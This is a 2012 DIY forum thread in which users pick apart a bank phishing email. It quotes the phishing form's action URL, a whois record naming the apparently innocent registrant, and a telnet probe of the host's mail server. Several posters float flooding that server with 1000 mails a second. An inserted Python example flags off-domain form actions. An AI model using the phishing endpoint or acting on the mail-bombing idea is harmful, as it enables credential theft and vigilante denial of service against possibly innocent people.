UK diy (uk.d-i-y) For the discussion of all topics related to diy (do-it-yourself) in the UK. All levels of experience and proficiency are welcome to join in to ask questions or offer solutions.

#1 Posted to uk.d-i-y
Idle fun for net hackers..

I got a phishing email today.

Told me to click on the HTML and sort out my bank.

A bit of inspection of the attached code showed that it wanted me, using
a direct copy of my bank's login page, to submit my details to a machine
in Australia. Registered address was a Richard someone or other.

Armed with the IP address of said spammer's machine, I managed to
ascertain it was running a mail system. Better still, it accepted mail
to 'root@localhost' (most machines will).

He has mail..

I do have under development on a centrally located server with
gigabytes of bandwidth a mail client that will send mail to any IP
address directly..the thought of flooding his mailbox with 1000 mails a
second appeals..

OTOH I may just register the IP address with spamhaus

:-(

#2

On Feb 23, 2:00 pm, The Natural Philosopher wrote:
> I got a phishing email today.
>
> Told me to click on the HTML and sort out my bank.
>
> A bit of inspection of the attached code showed that it wanted me, using
> a direct copy of my bank's login page, to submit my details to a machine
> in Australia. Registered address was a Richard someone or other.
>
> Armed with the IP address of said spammer's machine, I managed to
> ascertain it was running a mail system. Better still, it accepted mail
> to 'root@localhost' (most machines will).
>
> He has mail..
>
> I do have under development on a centrally located server with
> gigabytes of bandwidth a mail client that will send mail to any IP
> address directly..the thought of flooding his mailbox with 1000 mails a
> second appeals..
>
> OTOH I may just register the IP address with spamhaus
>
> :-(


was poor Richard directly responsible or had his domain been hacked by
miscreants?

Jim K
#3

On Feb 23, 2:13 pm, Jim K wrote:
> was poor Richard directly responsible or had his domain been hacked by
> miscreants?
>
> Jim K


If "poor Richard" has been hacked, receipt of 1000 mails a second might
make him more careful with his system security in future.

#4

On Feb 23, 3:01 pm, 82045 wrote:
> On Feb 23, 2:13 pm, Jim K wrote:
>> was poor Richard directly responsible or had his domain been hacked by
>> miscreants?
>>
>> Jim K
>
> If "poor Richard" has been hacked, receipt of 1000 mails a second might
> make him more careful with his system security in future.


More likely poor Richard doesn't have a clue what's going on, and will
simply have to abandon the email addy altogether.


NT
#5

NT wrote:
> On Feb 23, 3:01 pm, 82045 wrote:
>> On Feb 23, 2:13 pm, Jim K wrote:
>>> was poor Richard directly responsible or had his domain been hacked by
>>> miscreants?
>>> Jim K
>>
>> If "poor Richard" has been hacked, receipt of 1000 mails a second might
>> make him more careful with his system security in future.
>
> More likely poor Richard doesn't have a clue what's going on, and will
> simply have to abandon the email addy altogether.



Dear boy, it was not an 'email addy', it was a physical Linux machine.
And it was where, if I had been stupid enough to fall for the scam, the
supplied form would have sent my bank account details and password.

Now Richard may be entirely innocent, but if he is, his machine is
running a lot of code he doesn't know about, including a whole webserver
and set of PHP scripts.






#6

On 23/02/2012 15:53, NT wrote:
> More likely poor Richard doesn't have a clue what's going on, and will
> simply have to abandon the email addy altogether.


You may call him Richard, we'll just call him Dick.

Andy
#7

On Feb 23, 8:46 pm, Andy Champ wrote:
> On 23/02/2012 15:53, NT wrote:
>> More likely poor Richard doesn't have a clue what's going on, and will
>> simply have to abandon the email addy altogether.
>
> You may call him Richard, we'll just call him Dick.
>
> Andy


or Dick Unwittington perchance?

Jim K
#8

Tim Streater wrote:
> In article , NT wrote:
>> On Feb 23, 3:01 pm, 82045 wrote:
>>> On Feb 23, 2:13 pm, Jim K wrote:
>>>> was poor Richard directly responsible or had his domain been
>>>> hacked by
>>>> miscreants?
>>>
>>> If "poor Richard" has been hacked, receipt of 1000 mails a second might
>>> make him more careful with his system security in future.
>>
>> More likely poor Richard doesn't have a clue what's going on, and will
>> simply have to abandon the email addy altogether.
>
> The OP said that Richard was running a mail server.

He was running a web server to gather phished data.

> In which case if he
> set that up, he should know better. If he didn't, and he's just a bot,
> then 1000 mails a second should fill his disk up PDQ and the machine
> will fall over.


Look, it seems that people don't actually understand this scam.

A letter arrives. It appears to come from - let's say -


One giveaway is it isn't addressed directly to you, by name.

It tells you to click on the attached html form and fill it out.

This form takes 99% of your own bank's website, but with one crucial
difference: instead of submitting the form to your bank, it submits it
to the phishing web server. I didn't try doing that to see what would
happen.

e.g. in it is this line

<form name="form1"
action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post">

At that point whatever you keyed in is now available to the phisher.

Anyway, I identified that server, and discovered it would accept emails.

#whois drabcdfirstaid.com.au
Domain Name: drabcdfirstaid.com.au
Last Modified: 30-Aug-2011 10:55:39 UTC
Registrar ID: NetRegistry
Registrar Name: NetRegistry
Status: ok

Registrant: LLOYD, RICHARD MILES
Eligibility Type: Sole Trader
Eligibility ID: ABN 35521483210
......

so

#telnet www.drabcdfirstaid.com.au 25
Trying 64.251.30.196...
Connected to drabcdfirstaid.com.au.
Escape character is '^]'.
220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)

tells me it's an Ubuntu machine running Postfix mail. Now I know that if I
carry on with this telnet into the SMTP port, it's very likely that
root@localhost will be accepted as a direct recipient into the root
user's mailbox.

So I sent one. And it was.

The email came via an Oregon ISP. From a completely different source
entirely.

Now it's possible looking at the above that poor old Richard doesn't know
he has a nasty file stuffed in a hidden directory (.image) on his web
server.

OTOH I did not do anything nasty. He knows he's been violated at one
level or another so if he doesn't get down and check his server out, and
see lots of unusual access, he's a first grade dope anyway.
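The tell-tale the post above describes is that the attachment looks like the bank's page but its form posts to a third-party host. The check below is an added example, not code from the thread: it parses an HTML attachment and flags every form whose action host is not the expected bank domain (relative actions are flagged too, since a mailed attachment has no trustworthy origin). The sample HTML and the bank domain examplebank.example are constructed; the action URL is the one quoted in the post.

```python
"""Flag HTML forms whose action posts to a host other than the expected one."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action", ""))


def suspicious_form_actions(html, expected_host):
    """Return form actions whose host is not expected_host or a subdomain of it.

    A relative or empty action has no host at all; in an attachment opened
    from a mail client that is just as untrustworthy, so it is flagged too.
    """
    collector = FormActionCollector()
    collector.feed(html)
    flagged = []
    for action in collector.actions:
        host = (urlparse(action).hostname or "").lower()
        on_bank = host == expected_host or host.endswith("." + expected_host)
        if not on_bank:
            flagged.append(action)
    return flagged


# Constructed sample modelled on the attachment described in the thread:
# the visible page copies the bank, but the login form posts elsewhere.
SAMPLE_HTML = """
<html><body>
<h1>Example Bank - Secure Login</h1>
<form name="form1" action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<form action="https://online.examplebank.example/logout" method="post"></form>
</body></html>
"""

if __name__ == "__main__":
    for action in suspicious_form_actions(SAMPLE_HTML, "examplebank.example"):
        print("form posts off-domain:", action)
```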

#9

The Natural Philosopher:
> Tim Streater wrote:
>> In article oups.com, NT wrote:
>>> On Feb 23, 3:01 pm, 82045 wrote:
>>>> On Feb 23, 2:13 pm, Jim K wrote:
>>>>> was poor Richard directly responsible or had his domain been
>>>>> hacked by
>>>>> miscreants?
>>>>
>>>> If "poor Richard" has been hacked, receipt of 1000 mails a second
>>>> might
>>>> make him more careful with his system security in future.
>>>
>>> More likely poor Richard doesn't have a clue what's going on, and will
>>> simply have to abandon the email addy altogether.
>>
>> The OP said that Richard was running a mail server.
>
> He was running a web server to gather phished data.
>
>> In which case if he
>> set that up, he should know better. If he didn't, and he's just a
>> bot, then 1000 mails a second should fill his disk up PDQ and the
>> machine will fall over.
>
> Look, it seems that people don't actually understand this scam.
>
> A letter arrives. It appears to come from - let's say - customer-
>
> One giveaway is it isn't addressed directly to you, by name.
>
> It tells you to click on the attached html form and fill it out.


Do I understand you correctly, that some e-mail clients will accept an
HTML form and enable you to complete and submit it without it being
displayed in your browser? That sounds scary. I ask because my mail
client won't do anything like that, I'm sure.

--
Mike Barnes
#10


"The Natural Philosopher" wrote in message ...
> snip
>
> so
>
> #telnet www.drabcdfirstaid.com.au 25
> Trying 64.251.30.196...
> Connected to drabcdfirstaid.com.au.
> Escape character is '^]'.
> 220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)
>
> tells me it's an Ubuntu machine running Postfix mail. Now I know that if I
> carry on with this telnet into the SMTP port, it's very likely that
> root@localhost will be accepted as a direct recipient into the root user's
> mailbox.
>
> So I sent one. And it was.
>
> snip

This tells me that you aren't in the habit of typing in SMTP at the
keyboard, or you could have confirmed the acceptance of the 'root@localhost'
address whilst connected to the server via Telnet.
Then again, I'd have to refresh my memory of the RFCs before attempting it
now :-)

Ah - rereading, it may well be that you did as I suggested instead of sending
a separate email.

For those wondering if it was a mail address, a web server, whatever, a
standard server install of Ubuntu can give you the whole nine yards in one
go.
Possibly the person who set up the system was focussed on installing the web
server and hadn't realised he/she/it had also set up a working mail server
by default.
Then again all the incoming mail may be redirected to '/dev/null'.

Cheers

Dave R

--
No plan survives contact with the enemy.
[Not even bunny]

Helmuth von Moltke the Elder

(\__/)
(='.'=)
(")_(")



#11

82045 wrote:
> On Feb 23, 2:13 pm, Jim K wrote:
>> was poor Richard directly responsible or had his domain been hacked by
>> miscreants?
>>
>> Jim K
>
> If "poor Richard" has been hacked, receipt of 1000 mails a second might
> make him more careful with his system security in future.

Precisely do.
#12

Jim K wrote:
> On Feb 23, 2:00 pm, The Natural Philosopher wrote:
>> I got a phishing email today.
>>
>> Told me to click on the HTML and sort out my bank.
>>
>> A bit of inspection of the attached code showed that it wanted me, using
>> a direct copy of my bank's login page, to submit my details to a machine
>> in Australia. Registered address was a Richard someone or other.
>>
>> Armed with the IP address of said spammer's machine, I managed to
>> ascertain it was running a mail system. Better still, it accepted mail
>> to 'root@localhost' (most machines will).
>>
>> He has mail..
>>
>> I do have under development on a centrally located server with
>> gigabytes of bandwidth a mail client that will send mail to any IP
>> address directly..the thought of flooding his mailbox with 1000 mails a
>> second appeals..
>>
>> OTOH I may just register the IP address with spamhaus
>>
>> :-(
>
> was poor Richard directly responsible or had his domain been hacked by
> miscreants?


well that's up to him to sort out.

But the machine looked pretty tight to me.




Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright ©2004-2024 DIYbanter.
The comments are property of their posters.
 
